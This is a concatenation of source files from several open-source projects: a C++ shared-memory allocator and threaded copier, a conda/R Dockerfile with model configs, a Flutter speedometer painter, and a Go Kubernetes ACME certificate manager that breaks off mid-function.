if (thread_idx < per_worker.rem) {
++next_start;
}
auto d_thread =
reinterpret_cast<typename BaseCopierT::PtrT *>(d) + curr_start;
auto s_thread =
reinterpret_cast<typename BaseCopierT::PtrT *>(s) + curr_start;
if (shm_to_user) {
threads.emplace_back(
&Copier::shm_to_user, &base_copier, d_thread, s_thread,
(next_start - curr_start) * sizeof(typename BaseCopierT::PtrT));
} else {
threads.emplace_back(
&Copier::user_to_shm, &base_copier, d_thread, s_thread,
(next_start - curr_start) * sizeof(typename BaseCopierT::PtrT));
}
}
for (auto &thread : threads) {
thread.join();
}
threads.clear();
}
void shm_to_user(void *dst, void *src, size_t size) override {
_copy(dst, src, size, true);
}
void user_to_shm(void *dst, void *src, size_t size) override {
_copy(dst, src, size, false);
}
private:
BaseCopierT base_copier;
};
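// Example (not exercised by the benchmarks above; the thread count of 4 is an
// arbitrary choice): a multi-threaded copier that splits each copy across
// worker threads backed by the plain copier:
//
//   shm::memory::dragons::MTCopier<shm::memory::DefaultCopier, 4> mt_copier;
//   mt_copier.user_to_shm(dst, src, size);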
//------------------------------------------------------------------------------
} // namespace shm::memory::dragons
#endif // INCLUDE_SHADESMAR_MEMORY_DRAGONS_H_
<|start_filename|>include/shadesmar/memory/allocator.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_MEMORY_ALLOCATOR_H_
#define INCLUDE_SHADESMAR_MEMORY_ALLOCATOR_H_
#include <cassert>
#include "shadesmar/concurrency/robust_lock.h"
#include "shadesmar/concurrency/scope.h"
namespace shm::memory {
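// SHMALIGN rounds s up to the next multiple of a, where a must be a power of
// two; e.g. SHMALIGN(33, 32) == 64 and SHMALIGN(32, 32) == 32.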
#define SHMALIGN(s, a) (((s - 1) | (a - 1)) + 1)
inline uint8_t *align_address(void *ptr, size_t alignment) {
auto int_ptr = reinterpret_cast<uintptr_t>(ptr);
auto aligned_int_ptr = SHMALIGN(int_ptr, alignment);
return reinterpret_cast<uint8_t *>(aligned_int_ptr);
}
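// Allocator manages a circular buffer that lives offset_ bytes past this
// object in shared memory. alloc() writes a uint32_t size header at
// alloc_index_ followed by the payload and advances the index; free()
// releases allocations strictly in FIFO order by advancing free_index_.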
class Allocator {
public:
using handle = uint64_t;
template <concurrent::ExlOrShr type>
using Scope = concurrent::ScopeGuard<concurrent::RobustLock, type>;
Allocator(size_t offset, size_t size);
uint8_t *alloc(uint32_t bytes);
uint8_t *alloc(uint32_t bytes, size_t alignment);
bool free(const uint8_t *ptr);
void reset();
void lock_reset();
inline handle ptr_to_handle(uint8_t *p) {
return p - reinterpret_cast<uint8_t *>(heap_());
}
uint8_t *handle_to_ptr(handle h) {
return reinterpret_cast<uint8_t *>(heap_()) + h;
}
size_t get_free_memory() {
Scope<concurrent::SHARED> _(&lock_);
size_t free_size;
size_t size = size_ / sizeof(int);
if (free_index_ <= alloc_index_) {
free_size = size - alloc_index_ + free_index_;
} else {
free_size = free_index_ - alloc_index_;
}
return free_size * sizeof(int);
}
concurrent::RobustLock lock_;
private:
void validate_index(uint32_t index) const;
[[nodiscard]] uint32_t suggest_index(uint32_t header_index,
uint32_t payload_size) const;
uint32_t *__attribute__((always_inline)) heap_() {
return reinterpret_cast<uint32_t *>(reinterpret_cast<uint8_t *>(this) +
offset_);
}
uint32_t alloc_index_;
volatile uint32_t free_index_;
size_t offset_;
size_t size_;
};
Allocator::Allocator(size_t offset, size_t size)
: alloc_index_(0), free_index_(0), offset_(offset), size_(size) {
assert(!(size & (sizeof(int) - 1)));
}
void Allocator::validate_index(uint32_t index) const {
assert(index < (size_ / sizeof(int)));
}
uint32_t Allocator::suggest_index(uint32_t header_index,
uint32_t payload_size) const {
validate_index(header_index);
int32_t payload_index = header_index + 1;
if (payload_index + payload_size - 1 >= size_ / sizeof(int)) {
payload_index = 0;
}
validate_index(payload_index);
validate_index(payload_index + payload_size - 1);
return payload_index;
}
uint8_t *Allocator::alloc(uint32_t bytes) { return alloc(bytes, 1); }
uint8_t *Allocator::alloc(uint32_t bytes, size_t alignment) {
uint32_t payload_size = bytes + alignment;
if (payload_size == 0) {
payload_size = sizeof(int);
}
if (payload_size >= size_ - 2 * sizeof(int)) {
return nullptr;
}
if (payload_size & (sizeof(int) - 1)) {
payload_size &= ~(sizeof(int) - 1);
payload_size += sizeof(int);
}
payload_size /= sizeof(int);
Scope<concurrent::EXCLUSIVE> _(&lock_);
const auto payload_index = suggest_index(alloc_index_, payload_size);
const auto free_index_th = free_index_;
uint32_t new_alloc_index = payload_index + payload_size;
if (alloc_index_ < free_index_th && payload_index == 0) {
return nullptr;
}
if (payload_index <= free_index_th && free_index_th <= new_alloc_index) {
return nullptr;
}
if (new_alloc_index == size_ / sizeof(int)) {
new_alloc_index = 0;
if (new_alloc_index == free_index_th) {
return nullptr;
}
}
assert(new_alloc_index != alloc_index_);
validate_index(new_alloc_index);
heap_()[alloc_index_] = payload_size;
alloc_index_ = new_alloc_index;
auto heap_ptr = reinterpret_cast<void *>(heap_() + payload_index);
return align_address(heap_ptr, alignment);
}
bool Allocator::free(const uint8_t *ptr) {
if (ptr == nullptr) {
return true;
}
auto *heap = reinterpret_cast<uint8_t *>(heap_());
Scope<concurrent::EXCLUSIVE> _(&lock_);
assert(ptr >= heap);
assert(ptr < heap + size_);
validate_index(free_index_);
uint32_t payload_size = heap_()[free_index_];
uint32_t payload_index = suggest_index(free_index_, payload_size);
if (ptr != reinterpret_cast<uint8_t *>(heap_() + payload_index)) {
return false;
}
uint32_t new_free_index = payload_index + payload_size;
if (new_free_index == size_ / sizeof(int)) {
new_free_index = 0;
}
free_index_ = new_free_index;
return true;
}
void Allocator::reset() {
alloc_index_ = 0;
free_index_ = 0;
}
void Allocator::lock_reset() { lock_.reset(); }
} // namespace shm::memory
#endif // INCLUDE_SHADESMAR_MEMORY_ALLOCATOR_H_
| Watch-Later/shadesmar |
<|start_filename|>Dockerfile<|end_filename|>
FROM continuumio/anaconda3:2019.07
RUN /opt/conda/bin/conda update -y conda
RUN mkdir /vampire
COPY Dockerfile /vampire/
COPY install/ /vampire/install/
WORKDIR /vampire
# Install conda dependencies.
RUN /opt/conda/bin/conda env create -f install/environment.yml
RUN /opt/conda/bin/conda env update -n vampire -f install/environment-R.yml
RUN /opt/conda/bin/conda env create -f install/environment-olga.yml
# Install R dependencies.
RUN /opt/conda/bin/conda run -n vampire ./install/install_R_packages.sh
RUN /opt/conda/bin/conda run -n vampire R --vanilla --slave -e 'install.packages("BiocManager",repos = "http://cran.us.r-project.org"); BiocManager::install("Biostrings")'
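# Example usage (not part of the original file; image tag and command are
# illustrative only):
#   docker build -t vampire .
#   docker run -it vampire /bin/bash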
<|start_filename|>vampire/demo/model_params.json<|end_filename|>
{
"comment": "This is how models and their training parameters are specified. See tcr_vae.py for reference. Note that the training parameters are quite insufficient for training a real model.",
"model": "basic",
"latent_dim": 20,
"dense_nodes": 75,
"aa_embedding_dim": 21,
"v_gene_embedding_dim": 30,
"j_gene_embedding_dim": 13,
"beta": 0.75,
"max_cdr3_len": 30,
"n_aas": 21,
"n_v_genes": 59,
"n_j_genes": 13,
"stopping_monitor": "val_loss",
"batch_size": 100,
"pretrains": 2,
"warmup_period": 3,
"epochs": 10,
"patience": 20
}
<|start_filename|>vampire/pipe_main/sample_data/sample.json<|end_filename|>
{
"comment": "Just for the purposes of this sample JSON run specification file, the test path overlaps with the train path. Of course, don't do this for a real analysis.",
"test_paths" : [
"sample_data/02-0249_TCRB.4000.tsv.bz2"
],
"train_tsv_path" : "sample_data/02-0249_TCRB.4000.tsv.bz2",
"train_size" : 1000,
"nseqs" : 100
}
| kmayerb/vampire |
<|start_filename|>test/flutter_speedometer_test.dart<|end_filename|>
import 'package:flutter_test/flutter_test.dart';
import 'package:flutter_speedometer/flutter_speedometer.dart';
void main() {
  test('Speedometer can be constructed', () {
    final speedometer = Speedometer();
    expect(speedometer, isNotNull);
  });
}
<|start_filename|>lib/src/painter.dart<|end_filename|>
import 'dart:math' as math;
import 'package:flutter/material.dart';
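/// Paints a stroked arc for the gauge face; [startAngle] and [sweepAngle] are
/// expressed in units of pi/12 radians (15 degree steps), as converted in
/// [paint].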
class ArcPainter extends CustomPainter {
ArcPainter(
{this.startAngle = 0, this.sweepAngle = 0, this.color = Colors.white});
final double startAngle;
final double sweepAngle;
final Color color;
@override
void paint(Canvas canvas, Size size) {
final rect = Rect.fromLTRB(size.width * 0.05, size.width * 0.05,
size.width * 0.95, size.height * 0.95);
final startAngle = math.pi / 12 * this.startAngle;
final sweepAngle = math.pi / 12 * this.sweepAngle;
final useCenter = false;
final paint = Paint()
..color = this.color
..style = PaintingStyle.stroke
..strokeWidth = size.width * 0.1;
canvas.drawArc(rect, startAngle, sweepAngle, useCenter, paint);
}
  @override
  bool shouldRepaint(ArcPainter old) {
    // Repaint when any of the arc parameters change.
    return old.startAngle != startAngle ||
        old.sweepAngle != sweepAngle ||
        old.color != color;
  }
}
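/// Clips an upward-pointing triangle (apex at the top center, base along the
/// bottom edge).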
class TriangleClipper extends CustomClipper<Path> {
@override
Path getClip(Size size) {
final path = Path();
path.moveTo(size.width * 0.5, 0.0);
path.lineTo(size.width, size.height);
path.lineTo(0.0, size.height);
path.close();
return path;
}
@override
bool shouldReclip(TriangleClipper oldClipper) => false;
}
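/// Clips a thin needle shape that runs from the center of the dial down to
/// its lower edge.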
class KimClipper extends CustomClipper<Path> {
@override
Path getClip(Size size) {
final path = Path();
path.moveTo(size.width * 0.5, size.width * 0.5);
path.lineTo(size.width * 0.5 + size.width / 30, size.height * 0.5);
path.lineTo(size.width * 0.5 + 1, size.height - size.width / 30);
path.lineTo(size.width * 0.5 - 1, size.height - size.width / 30);
path.lineTo(size.width * 0.5 - size.width / 30, size.height * 0.5);
path.close();
return path;
}
@override
bool shouldReclip(KimClipper oldClipper) => false;
}
| lhamycodes/Flutter-Speedometer |
<|start_filename|>processor.go<|end_filename|>
// Copyright 2016 Google Inc. All Rights Reserved.
// Copyright 2016 Palm Stone Games, Inc. All Rights Reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"crypto/rand"
"crypto/rsa"
"crypto/x509"
"encoding/json"
"encoding/pem"
"fmt"
"log"
"sort"
"strings"
"sync"
"time"
"github.com/boltdb/bolt"
"github.com/pkg/errors"
"github.com/xenolf/lego/acme"
"github.com/xenolf/lego/providers/dns/azure"
"github.com/xenolf/lego/providers/dns/cloudflare"
"github.com/xenolf/lego/providers/dns/cloudxns"
"github.com/xenolf/lego/providers/dns/digitalocean"
"github.com/xenolf/lego/providers/dns/dnsimple"
"github.com/xenolf/lego/providers/dns/dnsmadeeasy"
"github.com/xenolf/lego/providers/dns/dnspod"
"github.com/xenolf/lego/providers/dns/dyn"
"github.com/xenolf/lego/providers/dns/gandi"
"github.com/xenolf/lego/providers/dns/gandiv5"
"github.com/xenolf/lego/providers/dns/googlecloud"
"github.com/xenolf/lego/providers/dns/linode"
"github.com/xenolf/lego/providers/dns/namecheap"
"github.com/xenolf/lego/providers/dns/ovh"
"github.com/xenolf/lego/providers/dns/pdns"
"github.com/xenolf/lego/providers/dns/rfc2136"
"github.com/xenolf/lego/providers/dns/route53"
"github.com/xenolf/lego/providers/dns/vultr"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/pkg/api"
"k8s.io/client-go/pkg/api/unversioned"
"k8s.io/client-go/pkg/api/v1"
"k8s.io/client-go/pkg/apis/extensions/v1beta1"
"k8s.io/client-go/pkg/labels"
"k8s.io/client-go/pkg/selection"
"k8s.io/client-go/rest"
)
// CertProcessor holds the shared configuration, state, and locks
type CertProcessor struct {
acmeURL string
certSecretPrefix string
certNamespace string
tagPrefix string
namespaces []string
class string
defaultProvider string
defaultEmail string
db *bolt.DB
Lock sync.Mutex
HTTPLock sync.Mutex
TLSLock sync.Mutex
k8s K8sClient
renewBeforeDays int
}
// NewCertProcessor creates and populates a CertProcessor
func NewCertProcessor(
k8s *kubernetes.Clientset,
certClient *rest.RESTClient,
acmeURL string,
certSecretPrefix string,
certNamespace string,
tagPrefix string,
namespaces []string,
class string,
defaultProvider string,
defaultEmail string,
db *bolt.DB,
renewBeforeDays int) *CertProcessor {
return &CertProcessor{
k8s: K8sClient{c: k8s, certClient: certClient},
acmeURL: acmeURL,
certSecretPrefix: certSecretPrefix,
certNamespace: certNamespace,
tagPrefix: tagPrefix,
namespaces: namespaces,
class: class,
defaultProvider: defaultProvider,
defaultEmail: defaultEmail,
db: db,
renewBeforeDays: renewBeforeDays,
}
}
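// newACMEClient builds an ACME client for the given challenge provider. The
// shared "http" and "tls" listeners also return a mutex used to serialize
// challenges; DNS providers return a nil mutex.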
func (p *CertProcessor) newACMEClient(acmeUser acme.User, provider string) (*acme.Client, *sync.Mutex, error) {
acmeClient, err := acme.NewClient(p.acmeURL, acmeUser, acme.RSA2048)
if err != nil {
return nil, nil, errors.Wrap(err, "Error while generating acme client")
}
initDNSProvider := func(p acme.ChallengeProvider, err error) (*acme.Client, *sync.Mutex, error) {
if err != nil {
return nil, nil, errors.Wrapf(err, "Error while initializing challenge provider %v", provider)
}
if err := acmeClient.SetChallengeProvider(acme.DNS01, p); err != nil {
return nil, nil, errors.Wrapf(err, "Error while setting challenge provider %v for dns-01", provider)
}
acmeClient.ExcludeChallenges([]acme.Challenge{acme.HTTP01, acme.TLSSNI01})
return acmeClient, nil, nil
}
switch provider {
case "http":
acmeClient.SetHTTPAddress(":8080")
acmeClient.ExcludeChallenges([]acme.Challenge{acme.DNS01, acme.TLSSNI01})
return acmeClient, &p.HTTPLock, nil
case "tls":
acmeClient.SetTLSAddress(":8081")
acmeClient.ExcludeChallenges([]acme.Challenge{acme.HTTP01, acme.DNS01})
return acmeClient, &p.TLSLock, nil
case "azure":
return initDNSProvider(azure.NewDNSProvider())
case "cloudflare":
return initDNSProvider(cloudflare.NewDNSProvider())
case "cloudxns":
return initDNSProvider(cloudxns.NewDNSProvider())
case "digitalocean":
return initDNSProvider(digitalocean.NewDNSProvider())
case "dnsimple":
return initDNSProvider(dnsimple.NewDNSProvider())
case "dnsmadeeasy":
return initDNSProvider(dnsmadeeasy.NewDNSProvider())
case "dnspod":
return initDNSProvider(dnspod.NewDNSProvider())
case "dyn":
return initDNSProvider(dyn.NewDNSProvider())
case "gandi":
return initDNSProvider(gandi.NewDNSProvider())
case "gandiv5":
return initDNSProvider(gandiv5.NewDNSProvider())
case "googlecloud":
return initDNSProvider(googlecloud.NewDNSProvider())
case "linode":
return initDNSProvider(linode.NewDNSProvider())
case "namecheap":
return initDNSProvider(namecheap.NewDNSProvider())
case "ovh":
return initDNSProvider(ovh.NewDNSProvider())
case "pdns":
return initDNSProvider(pdns.NewDNSProvider())
case "rfc2136":
return initDNSProvider(rfc2136.NewDNSProvider())
case "route53":
return initDNSProvider(route53.NewDNSProvider())
case "vultr":
return initDNSProvider(vultr.NewDNSProvider())
default:
return nil, nil, errors.Errorf("Unknown provider %v", provider)
}
}
func (p *CertProcessor) syncCertificates() error {
p.Lock.Lock()
defer p.Lock.Unlock()
certificates, err := p.getCertificates()
if err != nil {
return err
}
var wg sync.WaitGroup
for _, cert := range certificates {
wg.Add(1)
go func(cert Certificate) {
defer wg.Done()
_, err := p.processCertificate(cert)
if err != nil {
log.Printf("Error while processing certificate during sync: %v", err)
}
}(cert)
}
wg.Wait()
return nil
}
func (p *CertProcessor) getSecrets() ([]v1.Secret, error) {
var secrets []v1.Secret
if len(p.namespaces) == 0 {
var err error
secrets, err = p.k8s.getSecrets(v1.NamespaceAll, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching secret list")
}
} else {
for _, namespace := range p.namespaces {
s, err := p.k8s.getSecrets(namespace, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching secret list")
}
secrets = append(secrets, s...)
}
}
return secrets, nil
}
func (p *CertProcessor) getCertificates() ([]Certificate, error) {
var certificates []Certificate
if len(p.namespaces) == 0 {
var err error
certificates, err = p.k8s.getCertificates(v1.NamespaceAll, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching certificate list")
}
} else {
for _, namespace := range p.namespaces {
certs, err := p.k8s.getCertificates(namespace, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching certificate list")
}
certificates = append(certificates, certs...)
}
}
return certificates, nil
}
func (p *CertProcessor) getIngresses() ([]v1beta1.Ingress, error) {
var ingresses []v1beta1.Ingress
if len(p.namespaces) == 0 {
var err error
ingresses, err = p.k8s.getIngresses(v1.NamespaceAll, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching ingress list")
}
} else {
for _, namespace := range p.namespaces {
igs, err := p.k8s.getIngresses(namespace, p.getLabelSelector())
if err != nil {
return nil, errors.Wrap(err, "Error while fetching ingress list")
}
ingresses = append(ingresses, igs...)
}
}
return ingresses, nil
}
func (p *CertProcessor) syncIngresses() error {
p.Lock.Lock()
defer p.Lock.Unlock()
ingresses, err := p.getIngresses()
if err != nil {
return err
}
var wg sync.WaitGroup
for _, ingress := range ingresses {
wg.Add(1)
go func(ingress v1beta1.Ingress) {
p.processIngress(ingress)
wg.Done()
}(ingress)
}
wg.Wait()
return nil
}
func (p *CertProcessor) watchKubernetesEvents(namespace string, selector labels.Selector, wg *sync.WaitGroup, doneChan <-chan struct{}) {
if namespace == v1.NamespaceAll {
log.Printf("Watching certificates and ingresses in all namespaces")
} else {
log.Printf("Watchining certificates and ingresses in namespace %s", namespace)
}
certEvents := p.k8s.monitorCertificateEvents(namespace, selector, doneChan)
ingressEvents := p.k8s.monitorIngressEvents(namespace, selector, doneChan)
for {
select {
case event := <-certEvents:
err := p.processCertificateEvent(event)
if err != nil {
log.Printf("Error while processing certificate event: %v", err)
}
case event := <-ingressEvents:
p.processIngressEvent(event)
case <-doneChan:
wg.Done()
log.Println("Stopped certificate event watcher.")
return
}
}
}
func (p *CertProcessor) maintenance(syncInterval time.Duration, wg *sync.WaitGroup, doneChan <-chan struct{}) {
for {
select {
case <-time.After(syncInterval):
if err := p.syncCertificates(); err != nil {
log.Printf("Error while synchronizing certificates during refresh: %s", err)
}
if err := p.syncIngresses(); err != nil {
log.Printf("Error while synchronizing ingresses during refresh: %s", err)
}
if err := p.gcSecrets(); err != nil {
log.Printf("Error cleaning up secrets: %s", err)
}
case <-doneChan:
wg.Done()
log.Println("Stopped refresh loop.")
return
}
}
}
func (p *CertProcessor) processCertificateEvent(c CertificateEvent) error {
p.Lock.Lock()
defer p.Lock.Unlock()
switch c.Type {
case "ADDED", "MODIFIED":
_, err := p.processCertificate(c.Object)
return err
}
return nil
}
func (p *CertProcessor) secretName(cert Certificate) string {
if cert.Spec.SecretName != "" {
return cert.Spec.SecretName
}
return p.certSecretPrefix + cert.Spec.Domain
}
// normalizeHostnames returns a copy of the hostnames array where all hostnames are lower
// cased and the array sorted.
// This allows the input to have changed order or different casing between runs,
// but a new certificate will only be created if a certificate is added or removed.
func normalizeHostnames(hostnames []string) []string {
arr := make([]string, len(hostnames))
copy(arr, hostnames)
for i, hostname := range arr {
arr[i] = strings.ToLower(hostname)
}
sort.Strings(arr)
return arr
}
func (p *CertProcessor) getStoredAltNames(cert Certificate) ([]string, error) {
var altNamesRaw []byte
err := p.db.View(func(tx *bolt.Tx) error {
altNamesRaw = tx.Bucket([]byte("domain-altnames")).Get([]byte(cert.Spec.Domain))
return nil
})
if err != nil {
return nil, errors.Wrapf(err, "Error while fetching altnames from database for domain %v", cert.Spec.Domain)
}
if altNamesRaw == nil {
return nil, nil
}
var altNames []string
err = json.Unmarshal(altNamesRaw, &altNames)
if err != nil {
return nil, errors.Wrapf(err, "Error while unmarshalling altnames from database for domain %v", cert.Spec.Domain)
}
return altNames, nil
}
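// equalAltNames reports whether two normalized hostname slices contain the
// same entries in the same order.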
func equalAltNames(a, b []string) bool {
if len(a) != len(b) {
return false
}
for i := range a {
if a[i] != b[i] {
return false
}
}
return true
}
// processCertificate creates or renews the corresponding secret
// processCertificate will create new ACME users if necessary, and complete ACME challenges
// processCertificate caches ACME user and certificate information in boltdb for reuse
func (p *CertProcessor) processCertificate(cert Certificate) (processed bool, err error) {
var (
acmeUserInfo ACMEUserData
acmeCertDetails ACMECertDetails
acmeCert ACMECertData
acmeClient *acme.Client
acmeClientMutex *sync.Mutex
)
namespace := certificateNamespace(cert)
// Fetch current certificate data from k8s
s, err := p.k8s.getSecret(namespace, p.secretName(cert))
if err != nil {
return false, errors.Wrapf(err, "Error while fetching certificate acme data for domain %v", cert.Spec.Domain)
}
altNames := normalizeHostnames(cert.Spec.AltNames)
storedAltNames, err := p.getStoredAltNames(cert)
if err != nil {
return false, errors.Wrap(err, "Error while getting stored alternative names")
}
sameAltNames := equalAltNames(altNames, storedAltNames)
// If a cert exists and its altNames match, check its expiry and expected altNames
if s != nil && getDomainFromLabel(s, p.tagPrefix) == cert.Spec.Domain && sameAltNames {
acmeCert, err = NewACMECertDataFromSecret(s, p.tagPrefix)
if err != nil {
return false, errors.Wrapf(err, "Error while decoding acme certificate from secret for existing domain %v", cert.Spec.Domain)
}
// Decode cert
pemBlock, _ := pem.Decode(acmeCert.Cert)
if pemBlock == nil {
return false, errors.Wrapf(err, "Got nil back when decoding x509 encoded certificate for existing domain %v", cert.Spec.Domain)
}
parsedCert, err := x509.ParseCertificate(pemBlock.Bytes)
if err != nil {
return false, errors.Wrapf(err, "Error while parsing x509 encoded certificate for existing domain %v", cert.Spec.Domain)
}
// If certificate expires after now + p.renewBeforeDays, don't renew
if parsedCert.NotAfter.After(time.Now().Add(time.Hour * time.Duration(24*p.renewBeforeDays))) {
return false, nil
}
log.Printf("[%v] Expiry for cert is in less than %v days (%v), attempting renewal", cert.Spec.Domain, p.renewBeforeDays, parsedCert.NotAfter.String())
}
// Fetch acme user data and cert details from bolt
var userInfoRaw, certDetailsRaw []byte
err = p.db.View(func(tx *bolt.Tx) error {
userInfoRaw = tx.Bucket([]byte("user-info")).Get([]byte(cert.Spec.Domain))
certDetailsRaw = tx.Bucket([]byte("cert-details")).Get([]byte(cert.Spec.Domain))
return nil
})
if err != nil {
return false, errors.Wrapf(err, "Error while running bolt view transaction for domain %v", cert.Spec.Domain)
}
provider := valueOrDefault(cert.Spec.Provider, p.defaultProvider)
email := valueOrDefault(cert.Spec.Email, p.defaultEmail)
// Handle user information
if userInfoRaw != nil { // Use existing user
if err := json.Unmarshal(userInfoRaw, &acmeUserInfo); err != nil {
return false, errors.Wrapf(err, "Error while unmarshalling user info for %v", cert.Spec.Domain)
}
log.Printf("Creating ACME client for %v provider for %v", provider, cert.Spec.Domain)
acmeClient, acmeClientMutex, err = p.newACMEClient(&acmeUserInfo, provider)
if err != nil {
return false, errors.Wrapf(err, "Error while creating ACME client for %v provider for %v", provider, cert.Spec.Domain)
}
// Some ACME providers require locking; if the mutex is specified, lock it
if acmeClientMutex != nil {
acmeClientMutex.Lock()
defer acmeClientMutex.Unlock()
}
} else { // Generate a new ACME user
userKey, err := rsa.GenerateKey(rand.Reader, 2048)
if err != nil {
return false, errors.Wrapf(err, "Error while generating rsa key for new user for domain %v", cert.Spec.Domain)
}
acmeUserInfo.Email = email
acmeUserInfo.Key = pem.EncodeToMemory(&pem.Block{
Type: "RSA PRIVATE KEY",
Bytes: x509.MarshalPKCS1PrivateKey(userKey),
})
log.Printf("Creating ACME client for %v provider for %v", provider, cert.Spec.Domain)
acmeClient, acmeClientMutex, err = p.newACMEClient(&acmeUserInfo, provider)
if err != nil {
return false, errors.Wrapf(err, "Error while creating ACME client for %v", cert.Spec.Domain)
}
// Some ACME providers require locking; if the mutex is specified, lock it
if acmeClientMutex != nil {
acmeClientMutex.Lock()
defer acmeClientMutex.Unlock()
}
// Register
acmeUserInfo.Registration, err = acmeClient.Register()
if err != nil {
return false, errors.Wrapf(err, "Error while registering user for new domain %v", cert.Spec.Domain)
}
// Agree to TOS
if err := acmeClient.AgreeToTOS(); err != nil {
return false, errors.Wrapf(err, "Error while agreeing to acme TOS for new domain %v", cert.Spec.Domain)
}
}
domains := append([]string{cert.Spec.Domain}, altNames...)
// If we have cert details stored with expected altNames, do a renewal, otherwise, obtain from scratch
if certDetailsRaw == nil || acmeCert.DomainName == "" || !sameAltNames {
acmeCert.DomainName = cert.Spec.Domain
// Obtain a cert
certRes, errs := acmeClient.ObtainCertificate(domains, true, nil, false)
for _, domain := range domains {
if errs[domain] != nil {
return false, errors.Wrapf(errs[domain], "Error while obtaining certificate for new domain %v", domain)
}
}
// fill in data
acmeCert.Cert = certRes.Certificate
acmeCert.PrivateKey = certRes.PrivateKey
acmeCertDetails = NewACMECertDetailsFromResource(certRes)
} else {
if err := json.Unmarshal(certDetailsRaw, &acmeCertDetails); err != nil {
return false, errors.Wrapf(err, "Error while unmarshalling cert details for existing domain %v", cert.Spec.Domain)
}
// Fill in cert resource
certRes := acmeCertDetails.ToCertResource()
certRes.Certificate = acmeCert.Cert
certRes.PrivateKey = acmeCert.PrivateKey
certRes, err = acmeClient.RenewCertificate(certRes, true, false)
if err != nil {
return false, errors.Wrapf(err, "Error while renewing certificate for existing domain %v", cert.Spec.Domain)
}
// Fill in details
acmeCert.Cert = certRes.Certificate
acmeCert.PrivateKey = certRes.PrivateKey
acmeCertDetails = NewACMECertDetailsFromResource(certRes)
}
// Serialize acmeCertDetails and acmeUserInfo
certDetailsRaw, err = json.Marshal(&acmeCertDetails)
if err != nil {
return false, errors.Wrapf(err, "Error while marshalling cert details for domain %v", cert.Spec.Domain)
}
userInfoRaw, err = json.Marshal(&acmeUserInfo)
if err != nil {
return false, errors.Wrapf(err, "Error while marshalling user info for domain %v", cert.Spec.Domain)
}
altNamesRaw, err := json.Marshal(altNames)
if err != nil {
return false, errors.Wrapf(err, "Error while marshalling altNames for domain %v", cert.Spec.Domain)
}
// Save cert details and user info to bolt
err = p.db.Update(func(tx *bolt.Tx) error {
key := []byte(cert.Spec.Domain)
tx.Bucket([]byte("user-info")).Put(key, userInfoRaw)
tx.Bucket([]byte("cert-details")).Put(key, certDetailsRaw)
tx.Bucket([]byte("domain-altnames")).Put(key, altNamesRaw)
return nil
})
if err != nil {
return false, errors.Wrapf(err, "Error while saving data to bolt for domain %v", cert.Spec.Domain)
}
// Convert cert data to k8s secret
isUpdate := s != nil
s = acmeCert.ToSecret(p.tagPrefix, p.class)
s.Name = p.secretName(cert)
if isUpdate {
log.Printf("Updating secret %v in namespace %v for domain %v", s.Name, namespace, cert.Spec.Domain)
} else {
log.Printf("Creating secret %v in namespace %v for domain %v", s.Name, namespace, cert.Spec.Domain)
}
// Save the k8s secret
if err := p.k8s.saveSecret(namespace, s, isUpdate); err != nil {
return false, errors.Wrapf(err, "Error while saving secret for domain %v", cert.Spec.Domain)
}
msg := "Created certificate"
if isUpdate {
msg = "Updated certificate"
}
p.k8s.createEvent(v1.Event{
ObjectMeta: v1.ObjectMeta{
Namespace: namespace,
},
InvolvedObject: v1.ObjectReference{
Kind: "Secret",
Namespace: namespace,
Name: s.Name,
},
Reason: "ACMEUpdated",
Message: msg,
Source: v1.EventSource{
Component: "kube-cert-manager",
},
Type: "Normal",
})
return true, nil
}
func (p *CertProcessor) gcSecrets() error {
p.Lock.Lock()
defer p.Lock.Unlock()
// Fetch secrets before certificates. That way, if a race occurs,
// we will only fail to delete a secret, not accidentally delete
// one that's still referenced.
secrets, err := p.getSecrets()
if err != nil {
return err
}
certs, err := p.getCertificates()
if err != nil {
return err
}
ingresses, err := p.getIngresses()
if err != nil {
return err
}
for _, ingress := range ingresses {
certs = append(certs, ingressCertificates(p, ingress)...)
}
usedSecrets := map[string]bool{}
for _, cert := range certs {
usedSecrets[cert.Metadata.Namespace+" "+p.secretName(cert)] = true
}
for _, secret := range secrets {
// Only check for the deprecated "enabled" annotation if not using the "class" feature
if p.class == "" && secret.Annotations[addTagPrefix(p.tagPrefix, "enabled")] != "true" {
continue
}
if usedSecrets[secret.Namespace+" "+secret.Name] {
continue
}
log.Printf("Deleting unused secret %s in namespace %s", secret.Name, secret.Namespace)
if err := p.k8s.deleteSecret(secret.Namespace, secret.Name); err != nil {
return err
}
}
return nil
}
func (p *CertProcessor) processIngressEvent(c IngressEvent) {
p.Lock.Lock()
defer p.Lock.Unlock()
switch c.Type {
case "ADDED", "MODIFIED":
p.processIngress(c.Object)
}
}
func ingressCertificates(p *CertProcessor, ingress v1beta1.Ingress) []Certificate {
